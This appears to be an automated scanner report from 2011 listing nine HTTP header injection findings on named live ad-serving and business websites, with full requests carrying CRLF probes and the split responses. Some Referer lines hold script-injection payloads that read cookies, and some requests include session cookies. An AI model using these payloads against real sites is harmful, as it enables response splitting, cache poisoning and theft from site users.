HTTP Header Injection, CWE-113, DORK Search, 2-2-2011 Report

HTTP Header Injection DORKS for 2-2-2011 | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:39:30 CST 2011.


DORK CWE-79 XSS Report


1. HTTP header injection

1.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.2. http://102.xg4ken.com/media/redir.php [url[] parameter]

1.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]

1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

1.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]

1.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]



1. HTTP header injection
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 939d6%0d%0ad29cc9616d1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22&939d6%0d%0ad29cc9616d1=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f1e123c-7cbf-4f88-c29c-00007fc2381d; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22&939d6
d29cc9616d1
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://102.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 15d1e%0d%0ad4b2f64cb5a was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x2215d1e%0d%0ad4b2f64cb5a HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5768e8a0-3fce-aa69-4351-00001bc16518; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x2215d1e
d4b2f64cb5a

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload ae913%0d%0a56b335fe342 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=c110&t=129676725240202813&adid=249349&reid=123864&arid=0&auid=&cn=defaultImpression&et=i&_cc=249349,123864,10361.,10361.10364.,1296767252,1&tpos=0&iw=&uxnw=11894&uxss=sg11948&uxct=1&init=1&cr=ae913%0d%0a56b335fe342 HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _sid="c110_5569572937864193463"; _uid="a104_5562153497824379009"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,"; _sc="sg12288.1296767252.1296767253.28800.0.0,"; _wr="g12288"

Response

HTTP/1.1 302 Found
Set-Cookie: _auv="g12288~1.1296769260.0,12720.1296769260.0,^";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cvr="1296769250^11894^sg12288~sg11948^0~0^0.000000~55.000000,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296769245.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296769260.28800.0.0,";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:41:00 GMT;domain=.fwmrm.net;path=/;
Location: ae913
56b335fe342

Content-Length: 0
Date: Thu, 03 Feb 2011 21:40:59 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f0b45525d5f4f58455e445a4a423208;path=/;httponly


1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 24537%0d%0a2e8dc5adfe9 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleusipad%2F1%2FH.22.1%2Fs9681528011336%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252011%253A50%253A27%25204%2520360%26pageName%3Dipad%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26r%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.ipad%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26c5%3Dwin32%26c6%3D%253A%2520ipad%2520-%2520index%2520%28us%29%26c9%3Dwindows%26c14%3Ditunes%2520-%2520index%2520%28us%29%26c15%3Dno%2520zip%26c17%3Dundefined%253Aundefined%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleusipad%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dipad%253D1%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26u%3Dappleglobal%2Cappleitunes%2Cappleusitunesipod%26pid%3Ditunes%2520-%2520index%2520%28us%29%26pidt%3D1%26oid%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26ot%3DA%26u%3D0%26AQE%3D124537%0d%0a2e8dc5adfe9&A2S=1;ord=2015452841 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/ipad/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleusipad/1/H.22.1/s9681528011336?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2011%3A50%3A27%204%20360&pageName=ipad%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fipad%2F&r=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.ipad&c4=http%3A%2F%2Fwww.apple.com%2Fipad%2F&c5=win32&c6=%3A%20ipad%20-%20index%20(us)&c9=windows&c14=itunes%20-%20index%20(us)&c15=no%20zip&c17=undefined%3Aundefined&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleusipad&c48=1&c49=D%3Ds_vi&c50=ipad%3D1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&u=appleglobal,appleitunes,appleusitunesipod&pid=itunes%20-%20index%20(us)&pidt=1&oid=http%3A%2F%2Fwww.apple.com%2Fipad%2F&ot=A&u=0&AQE=124537
2e8dc5adfe9
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296755474


1.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.scanscout.com/B4852812.30

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62530%0d%0a230925b8b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62530%0d%0a230925b8b8/N3340.scanscout.com/B4852812.30 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62530
230925b8b8
/N3340.scanscout.com/B4852812.30:
Date: Thu, 03 Feb 2011 22:03:15 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 333cd%0d%0a3e381d53e01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /333cd%0d%0a3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/333cd
3e381d53e01
/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http: //ad.trafficmp.com/a/click
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 87fe3%0d%0a9a9fc1f6091 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /87fe3%0d%0a9a9fc1f6091/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/87fe3
9a9fc1f6091
/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D628759578:
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9db3a%0d%0aa4d4062d9d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9db3a%0d%0aa4d4062d9d8/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9db3a
a4d4062d9d8
/lb.buzzillions/%3Bnet%3Dlb%3Bu%3D%2Clb-5843489_1296770394%2C11d765b6a10b1b3%2Cnone%2Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bcontx%3Dnone%3Bdc%3Dw%3Bbtg%3Dan.:
Date: Fri, 04 Feb 2011 01:50:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cdbde%0d%0ad36a9dd2cc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /spportal/spportalFlow.docdbde%0d%0ad36a9dd2cc?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4 HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/support/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:10 GMT
Location: https://www.supermedia.com/spportal/spportalFlow.docdbde
d36a9dd2cc
?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4
Content-Length: 0
Connection: close
